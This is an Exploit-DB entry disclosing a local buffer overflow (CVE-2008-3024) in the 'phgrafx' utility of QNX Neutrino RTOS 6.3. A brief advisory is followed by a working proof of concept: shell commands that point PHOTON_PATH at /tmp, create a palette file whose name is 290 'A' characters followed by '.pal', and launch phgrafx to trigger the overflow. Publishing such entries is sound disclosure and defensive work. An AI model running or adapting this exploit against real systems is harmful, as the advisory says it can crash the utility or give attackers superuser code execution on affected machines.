QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow Vulnerability

2008-07-01T00:00:00
ID EDB-ID:32009
Type exploitdb
Reporter Filipe Balestra
Modified 2008-07-01T00:00:00

Description

QNX Neutrino RTOS 6.3 'phgrafx' Local Buffer Overflow Vulnerability. CVE-2008-3024. Dos exploit for unix platform

                                        
                                            source: http://www.securityfocus.com/bid/30024/info

QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.

Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.

QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx